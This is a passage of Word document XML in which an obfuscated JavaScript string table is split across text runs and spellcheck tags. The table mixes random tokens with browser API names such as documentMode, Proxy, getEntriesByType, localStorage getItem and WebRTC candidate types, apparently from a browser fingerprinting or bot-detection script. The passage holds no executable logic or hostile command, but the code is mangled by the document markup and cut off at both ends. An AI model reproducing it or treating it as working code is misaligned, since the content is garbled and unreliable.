      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8rIb", "string", "IccYhRvZ23XqiiA", "VBXsU7EKRN07BdTZkCQ", "bot1_wW-", "g1CpCKFQHfMZUOE", "mXD4XowgNdVMQ5T-hwh635dX", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qwKQB_RHKZs6KLbRhA", "2mDqPIY3QclPFoT2kCwy04o", "0-hpvR6lt1k", "80-FQcY", "e36hKtR3e5dRC5-HpUggh91YHDgnsRifTuiD9V5exVv_vAk0QSAsE_Ro1FfoqOSHahGNYHE", "N6olrgr0lB-Ty0hjXvKwEV7XsLeLP5pdyn4", "dlj3dw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>documentMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6WKucs1gKJY", "now", "dU72BJJ9ag", "xJse7EH3yUqN6CM8D9aO", "dzzFU9oze6Nq", "enumerable", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Odcu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "m4s_okyj-zbMzGhXZu2hFyWDg-XnYJR0", "xbUA033UyVk", "map", "^(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>--zn7c)?$|%", "Float64Array", "2Ngz8lLmwiz5gmI", "554", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ktg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "empty", "8d9TliOP62HwtCBTD4iSfS-Q29r8EdJ3x1kGMPSBT5JoD4T85_HNywvQLPEK", "kAvaOK1sXPk6", "Z4EEzXCVzQ", "4jj-K5c7dcMFGd6e", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kphz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6xiUDfhKSw", "4x7mf58AatwrQ8_G1WMBig", "bphlzxG3_W2z_xoTBuSrPG_v", "oUfPBKsXB6JqYfaUxXBH5ul8", "pDWJHKp6IaE","UkuVIPh_BYVVNIKZ8x9s1qhTBkE", "B7Yo7Rnd9A7qnUIzBZi-HVqb3OrD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HLw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "OVG0Lstxebp4R8rRqC1k9K4LfWRq_0mNNcjuqDQu4knh4Q4IFFxrMbRKowCj-tLS", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Proxy","true</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Date", "6hioIA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GKRmxg_vmQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bind", "type", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "J0jGLJIlC_hQDMHtzx1d150rJA", "oC2SEb1_dbYgLamw41gGoP58SFsZmXfvP5rC2A", "xnSyZOR6KKBSUZ2lkFk2gw", "cNNy9x650BDKkAw", "1Z0krxE", "LE7bbrIdH-ph", "sdBjmya8uQ", "DGbCU7odffA3K_G41Xxe4fVYNB4_wBK-Mdf_-wdisF3ImnZGUytNGIo", "yT7BdJ1yftgQ", "YybrIosOaPsQIK_x7y0B7b87b39gyH6tZ8Gz_lhc5w", "zEf1N9cBMMBtbbTQ1nRQr41CNx01yyo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "l1SBJ-1qbKt4ft3u0Q", "Y07pRNkLHsY6Spw", "YrERg2Shwxfz_WM2HsE", "Int8Array", "wt9XkzSClCw", "eNNRzjWL_1jf21Y_W--8CVrV_IjjEJUe3Ho", "-zzifIY5L54CWdaCpDZjxtMcfhAurxWSGf7T1SJmnBzrv1dhQBV9fvtexzirz6TJaCrD", "6JFR7S6f5G26vHgUGPSVOw", "_xf-ZakBINkEJoGqw1sS", "GH-Oe8N9R5ViHA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoJiqQjwzAo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "value", "ZVzfVL0cce5gKO31iBNf6bU_XRxVw2uqPYeQ00sPsDGAjjctY2UNHoxmqmWfx4D4CWOkSEaGC9vmPIKLPIRg", "Va8i20HK8TaJ2BgtIuqxNmLC0a3vV5FJ7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zWOBGIo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hIJQjzqBz2ytv3k", "clf_Z5E6UYZBHYA", "0rYCgX3LvSag431lFcnEayep0Ys", "XSPlU_8KUaVVDu6S", "x6Y-9G0", "g4VFzS7PmDCn4A", "AVy4PeBqZKY", "0I1PjSaKkk229ShlWJjnaCKxxPv7U_lU9xJgDK-gHdM", "BB74cYwWE-QjOsWJ0SA", "o7Ee", "top", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HRnkcPcsOA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1GbiAJtBWqkfQA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "O5piuAO1oWeQ_AwoMOj9JlGShOKuPMI", "TG-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>yWN0oK6NgYKr21HZAyZgWLR8GoUCKUQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastIndexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "svVtmT-2g2Hb2AlVP7niXBnWtoDSQep0pjctIebtJcoAVvCv5P_O1g", "stQj_ETJ0zE", "S0XubcI_KbduMNid", "apply", "XZRrsmqZ2kyknFEYeZi1VhGd3MvOPdIHxns","moJV32Hi1h_J", "JfJe3w7StGWN", "bF_xWIwgLchcc-_h6hcnww", "21", "yh6SOPhZU60g", "QE2vJdtjbrdTBPzMqnI7hcAUNTp66EzVOQ", "nZs-uA3Tz0G12yhsXv_SaEE", "hqxh2wKdlVieyww", "vACTKq8", "^[\\x20-\\x7E]$", "C6lK6zutvGe7sDEjBOObO3y7zw", "OzPkPYcre9wUB4M", "3R3Fd60_Le0", "t9V3-Qo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FjamNPlIHbID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ui-LBOVPP7oye-I", "bV2nVA", "olaVff54XeY", "KVmUOPB6IplpZbjZiw9K0710fBdI5Q", "BrMF_Ui-skftmTNxeuyAMSCB3feYIax4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2A7WWdEP", "Py_2Lp01", "7MpumjmO71bMw0N6eLCxCjndruPxF4IFoysRINW0QNI5Yuj_vIf5pgu6brorAmxOtbYAlMUo9zYI", "qS-MJbBTa7pTNQ", "uE0", "GRznZvUpDeIvC7bo", "U8Me7ieU1lqn_HU", "nkbHEa0xHt9Bc7OLsjcS8Q", "Symbol", "Xxu_bM1hQ6YvGcyQkQs_2JsIGDpJ", "error", "zf5C_Te2lXvvxA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bRXfAek5TuIuIJLp5hpP8g", "sewV-3Hnx2P2qnpzForBfwyvnayLf-wt0lU", "24VrzXOK", "x_46pT7l6GDyvzgAIA", "message", "Vt5e3AOA7HrM6A", "gZA2jS7pzwo", "Mme7JfR6ONoDDt_isz4thYw", "input", "1z2XBqNiMg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PwvWGKc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8XKJIrsvYpNFbA", "-TqlNMp5", "L_VwsEGEtVb82B1iXc_kCwnfmLOHb5BBiTVJG97zGf8peoLw7pf5qSLsH9Y5FmgZ0PRUxeA5txtGlH0", "de0jv0Xz7jfTlAgFNNU", "3lS-BONRELEVKqs", "6vdKrCWtiBCCj35fWZXFWA", "b7wwozC59RGrs2BaHdWwZSXM", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getEntriesByType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2rY", "lBDZK-paKKF7J6jXjF4a_rYhHUxI1C3_NYWs1A4_pWTPnHNIOA", "D5Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hOMAhxnR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vudW9iKdnnHP5EhUVKk", "rvJR4iKdknDm-lhe", "HGqrYtxvCP4eZg", "4VeHQuBOObdOa_2snn9etvZwNz90hiSgadXip31y_ALfnXtLHxkPWJ5X91yPv9m-SQn2DlHtS7X0JdqUaNpxZ4IpQB-nvr13ndY", "Fx6vQONA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avlkzCCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "PbgS80ewlGrbkwRXVOqvFw6n8MA", "OHO5JA", "UbEj5gXXkVffnBZSXeirBlnAzvynO9gKt21tZv__f5xcfcLqhZPhrkGlTf13Om1F2qwZhdV76BFB2AIo727X", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GhmxLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "\u202EEWibjQBAF\u202D", "x1_gJ582", "Fvg__0_2hFijkh5UPIS9WxSIh6nuOo1S5ykpfLTbHd15Pdj4sKOx_jmSUcN9QSUK_bBN", "aCWVaOIgNsZHFpL-wCgGr6Yy", "ShP4Yb0pQg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pgGNeNZpSLovJbqp_EJb-dkH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-eRflHi64DL9sC8SLg", "KXu7QcsKPOdrb4WuymVt2A", "8f1t9Qu-2UXT1kghfea9C0HL_LyuJYUO2XRFNKnnAN9qaoas04Grr3_DDdNwCH8SrKt0rqB59TEQiT9x5WnfxinvpdIeWRaBOSUwLI9G", "dV3nZMgAV95JDZ6MmyVx3Ikd", "Image", "xiurMd54FpcP", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getOwnPropertyNames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4-Uf0mjK0zvhl3xSR5iEeiD0yJXXSqhwsxIDDvrBOuRDTPTiqdPFnRetJfYLWAlkgt0yh8kUkkA8uQZLsVGoqQKb67Q", "LN2", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmrwMuMadoAPQME</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "tkPwPo4mKI9qddij8FZr", "rudG9TKdhEX770ZERZCZeheywJc", "Rpsi0UzerDaSzg4-", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvsvnUXJnCjCxBdfbA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "crypto", "FATicPAwCfYbBb_Q8TZeoYo", "Option", "pow", "qvUenn7bgiPVpy0lFIf_cw", "WroEtnzz0z-jkA", "LNoRz3filR39yg", "iDLEVa0OBPJsVZiB", "object", "khDTIp8UQ_pON6I", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cPUBlHLU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "y1eWB45mQ8E", "EIs9_R_CyBylgUcv", "cpYe1nnA1nM", "JJ9Qiz-1mGyt", "eJlBrRq95267hEt2Qg", "69NU1i6F7mKEuXIqQf_GZA", "Sl6wMt9b", "p1LgNIwmAt8bGZeJ6gNsjMRqBDhT5zDNWvqNlyRQj3er_wgkdA", "3YRFgDed-WSMsD4", "Q9VtuhG5syLu2EVTbdnuGw", "MzPwRIosHc94evzbrQIjqtI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jzOYWQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "self", "F3GvHfFFSf5pFKvi30MYuqBiM10", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RWegOsdw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "n8NlyxqivU7EzWZZaa6gUg", "7SmYbdQgMdVqA6Lu7D8jsLwKVw", "QKhP5DiglHKlpDY", "Function", "kp4", "7-UbqGLM", "UNDEFINED", "WlaXHf9RVqB7LenI3RV--7sqVAlA2nGZJI6b2mxGtg", "MdBAymj_vEL-yxoSRIjVIG6i_aXDW6di9DFxbK7ZNQ", "W5pnvSy5", "tGy-MZJcBZ13TJDE10Rpy9ZRGzMV6x7W", "pgCkUPNEV5kWG5WA-G950fkuJSoz0kXedNKa73YN01ay8Wt4PWN4eoU4", "Gb818UDl7lvlgwJrNpv5AhaAwOnE", "A0SzF85HEZpIGdHx5QM", "max", "M0XFbaQsEvdtIf3FziJR5pswVwtD9niwFovoxz9T83fD9kVeDHN2FOEBgly78o6bBginPSraWIn7LYeMJaglHawbdkPCn9gmy6TL6y-irXVJt09H-nUY7w", "sptnpBGuyVa0mgtN", "39YE2nDyjA", "Safari", "l_wCrXXw_inyul0XY4Q", "5o80kl3H9g", "awzFRdkbEI41XvDF4lQYrfg", "9eMd2UKhpg", "xrYynyaX11s", "method", "1G_YCrsCBdlTY_26xnpCqvdm", "s0LrZoQ-MpR2UdXw-1lqh5tZDSsN_RPZGaiXmQcihWP17ActfglBcqR4nk6riLuA", "U_c44GjWtyvJ5HQLNvjWL2Ditw", "mmjjJ88D", "A-YwvgTO1VfUlR8ABqb3Tx2J5ca5I4hSz2E8RaazEJEpbYa2hc6roS6LQA", "7gDWErA", "yUzBcMZgUZBaQN2q5A", "4Tm4CsRXdJo", "9vZGkkSXjVLK7A", "bg2YX-IQYtR5WcCcjg", "E6x89AWoySk", "wVfvOJ8oPL1jT8HG7lx7jg", "jBX7LZ8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eyWpS_U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-JA", "LRL1WoYUTLN-KKCntw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byteLength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRezIthr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Xbwz3UDU50eZ1B0hNvCuA2XE5_6rEo1O9XIXOY-qEMcmFbCqsMOHpBX0YrhDQnxk4_ZTjdc_u21L33I8xkjQ7lXtj7Y2", "5UaZQPRQbJY", "OzenP8F0E48JCpDrty5q1I0DPV4i_E_DCaaO_1srlQ", "ywKZetd3V7g7AK6g-Q", "P0vSPq84BfY", "J6Uo6EM", "seUw8TTKsi7xxgtM", "9waqGL0dYsJJO4OK", "EalE9xm4xG6dyGVZNMihCWmSyYI", "rfoqnFTA1QLClkwGboTvXQvatPHgVMNIqWgGQNmhaNAEDfX18s6HsFiqcaA", "Element", "V5lDty3u6XKgq1k0BbSOGQ", "llvbYfReRMNkHZmVt2wVj9k7Hg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FgDFVw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Mt1OnnK0ymf7", "LLwD92GZjWfKnDY", "jI4t8Hfj0Ec", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YwvYWbsGOw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "uwmFQPVZT7IdOOOExHdKuPRqI0o7niz9Konh_CxIo0SHmkhEH20JCcsQ_X3cmpCqQ0msTlrRR_3oDOnSVowqC-BtSw", "ybkHozPPzD6LhEM", "Al4", "Of5HoCvoslPM", "SWe8XtsdPPx3eqSly2N6x4BUIwgRpEKJ", "Ovty_n_AuA2i9lcYKfM", "SE7nRo40FOFJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>characterSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "wZ4", "R2LQ", "K4Irvg", "String", "PNsPj0rA1Q", "-dJ29jyR1g7txltRZw", "bzKedaxRRfsgbOvNvlkBoM1tTxIDtybrTZ6tlC8TuSuJuBIIE3trCrwYyQbq78TNXRrrKXqdV8PmYNve", "vuhT-RahmHL__Sl3D4jC", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BRqrPttj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "ydBfsSq1g2r4s2hXVZrIahOki9aCKuo5hhs4G6fKf_9XSNbXnuvPkGmYENMuYRw3lZ01tfZL0QZz8RUfrXS7hHCC48tWBlY", "_st4i1rXjnv64Q", "123", "TJBJ3jejmUG5ujR6Xg", "DGKN", "o2mtJtx6bLI", "95FLtjSm_HO9iVFtSJf_", "lDKdf99wE4E", "window", "R1KtaMppXYI", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"mivRNPpQLr92BrjdoVkW740", "iPEQmgne4Q_jtEAjAcWwTg", "JSON", "bzSwes9ib8YqA4n0sBIjn5wfXXtE5lKFT7CK2h4-zT3r9UJ_a1Y_I_Am3w", "Y_5X3DWU-WbooCQqD8mZMGXyoYeLC7Udv0B0A7-9Na9GC7Ge_J-AqVnqJetXGls316ogl4YL0Bk6rBYFjQ", "cP144w-q6EDflhIM", "bUDTDp8Ocst4ZK3ZmR4F", "vV66FrRISrY", "BDCsRalkOf0", "tF77bo4sXA","-nPHeaA", "HJo68QfVhQSNyEdOfrrsU1qkyfvGNMk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EoY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "put", "_qpX7BGu42yZyzQ", "JAKzT_ZSaZABVIWHtXMutP5USjpB", "jweAR_prZp0wFMKJoQ", "EQGAF80", "u6Bh-VzS5w", "0qI6u2-7", "l70P41SyqF7drQx1Xg", "svhHmzeIhDz343QVf_zJRmPs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wQLdEoo_Wdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ty-WH-0", "bdR_vA2O72zFrWAIVMA", "O5td03mfngeezlNtTOGlFHHCt50", "a6Nz-xA", "sort", "Uint32Array", "8a4XrHLu2jyprXsGXvaCMHywm9uUPb1zkk8mCsnDJ6lwI8STxcDgj2-HQYxwBVxB0Y1bz-8K3WEVy2Ft00WlgHrW","_CmSVMVITOdSY_g", "Zo9J3XWQjgmt8XNiZ9c", "J3-tRMhNFtpZR5o", "kr9zyyS6x2K9-g", "VBOzZMFmE4A-T5vJrxsz05wFQXpL_VyFRqKUh21n0w", "oQOeBf5QMKAocg", "ibcb40f40yag1SkoD_uCCg", "some", "zsNi7zTttE-fiRJUfYfnTHrE7L2tK54", "6_hjwg6Nq3bQhkZ_aKA", "H6g13VzO8QySwg88", "4rUYhg", "3D3oYtwSHQ", "ufkUuGztqwPJ9Cl3Wqs", "oa4og1Xa", "-3T4UIgSMtsKYILwpgRv1ZY", "W90", "x1XkeLoiWv1QENqK", "fuIPj23Agg-7qiBf", "sQnlRLAOGsE5BIKKrQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Cm6UB51hdYI", "body", "UGI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXTI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "kcEWx37doRfW9z9oWA", "0Yx3zxOB", "5OIanWPXsxbE01dMYczzFkmF", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zuE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "call", "OBLVRKE", "C45wvQGHi1KCyCsABd7UEmM", "hLRk5BCxkgyQ", "J2rbQKdRFcsFH5L71Qpy6Ot2URMViS2z", "-WquLso5XIprfOvo", "ucxDrx2hjk3ipWJiQo3SWRilsM2nK_4qhw", "d95whQOTqknZh0F4ew", "px0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>teFm_UbwlXzSng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Reflect", "floor", "QrpV6jzRpiaW92pRcA", "pYsuvHvtkweZ1ltnKbLyVAKI", "6\uFE0F\u20E3", "NGXffrUiR9pGJA", "a9704418b7c42678", "oijSF7UbbOISJu6P1W1HtNR0KUEshD32PJX_9zpYskikykESSC1LS5ge_W3Bq4LgEw", "Lfw04kThix_D2wANPOKyH17U0d2IN9wahG4", "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uFFFD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{}", "clear", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go18shuvknmF_A", "jZBdxSSIzm6R9CYxRLCbdgP2o5DSUvs", "YJlDyDePiWik8xUeBtuJIHE", "d6Za_jK_-02Kq3A_Eg", "7huIVudaQe8kKrvbjCgbg6IhZVVq", "jYJw4mA", "TcMGiEX_0wzRzC0", "6ZYvlFHX5AixiWc-bN2qLUyLuMCw", "yOx7jROTsWzRkEAMYNg", "k7ZfwyCK_nXJ-g", "b9Agj0ninzi0sT0Wa8WhRSPZ", "_HW1Isp0JoB9", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hUrFUrY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "rcNznAixsRmcgREgW6z1", "-7cGxmHayWbA5nwgWcmBOmTq5c-QWfhqihAHUPnlb6QJQq6M_Z_QjlvwN70eNB0y", "Ij69UMtdbZM", "E80CymnN-jbMuQ", "ChLqYowsfbQQRYHK8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "DAq_KtBhCp9B", "OkzZWLBJVN8lJ6Sr4wxI_vJsQg4", "d8wx-lv-7inSvlI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host|srflx|prflx|relay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "LB2XYORpTA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lF_ccdZFWA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "cgs", "complete", "zEmUCOVVUqRSKb6hl2MT", "mcA1vkDj7xaYwFA9Pf_vVRiOr_usMNwZ1w", "rif6eQ", "width", "vT7OBqMcIPsAYoXAwU1aoQ", "data", "9BfnFIpTXsUoB-OXsQ", "U8hWjiKAgQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ssADyyXfiiv_73Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BgzjaYYyDdIBSQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"ZxfBULQVVP0pYbyixSUI56FnJRdPyWGy", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uhiUJg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "yxOcO78uCu8uDIjR", "JAD7Xpp5TNBQUdy5pVFB0cU_MS8-lUHbCw", "BYdN226SiQeV8nltac4", "RzT_PZA3L8lcW4o", "vXLVPLJgYJckRtu3tm5R7-Z5HQ", "5AaiC853Xw", "qW-_eth2AY9oWdGYvEdkjcdSESwNqhvSBLnNnSQ5iD7prE14JyM0abxxilfrhauZcHLbVXvlM4bKFNftf6VMXYFWcBjSyZoEs_qj-CyLlk46jz4OvjUfixEe1bBWLyM11AFKkTxyGFChmb9NA5HTQnOkguW46szh51YpbGh4G3yNk5hlWyuGpTTT62ofOKqPM3GsJS4gQWOPxEgcCjOglae43cTPI50STLl_lszMHlbZlYjdDyRJ0zY", "4W6sZb0", "Ud8LkALOwlPlpDkXPZzNfiqp2P2D", "yLcKg1bFsAE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "MH-mP81CVJk", "2rIU0WTI3iOZvyF-S5jKfiWi4djhW_x4-xJxI_uVaNULQame-I3Hi0yBfrsaYgFm285litcK32Ig-QhBj06ms177lfgyY2WvD0R8VMNncqTXUJL-Vd_xOs6zMFC2hdyeaL-VPdOe_LpMRhOi73U5r6wJZwVYQDNKW-j2wIqJ-5B6cX2LhIdoR8QkDZvAlUN_wNtTjpKens9tNajw_dFFe3gUMyY_1HvjrFWSYT0g8bk_ZFdw5tS6eZwnwwcSoyur4LTN_Us7DAuSXKH_fb8oNm2cNrZHChdDbcnOqCR-H7zPK0v41BFq4f3fTNc-gBFEcmUDUH0Nw3w8RJ8wVVnD5aicumkgkIcT8_0KUiMMqnpYA5XVV_xpiuTkYLcfOhNGfaxda_f5Oe2XsvzyraMqYfd4YWM8ZIJPWX8bT5Qj-o86eFuKyT1po1K_wQydaWwJAlZ15DzxTs_up35x5BSVIBLNSwVtA0X-soOvyMxyGd0lUr1saX_zDTPe5M69GkMDHYrd8p3kK5B80c24B2KxwWRGESTiex6redfeKWGn4YslXgsWuw6WpEJIDgSrV7nu2qi3LOnSouDBv5y0GKoQM1rEMTyOyg6CFMkFUBbRxvHOVC0DkMhEyGP2KTa6IzhkWlfiG1j7MD0SnwuHpMcrRBOmhDOPnKDpdcZPXPgER_oDtZVgL7iy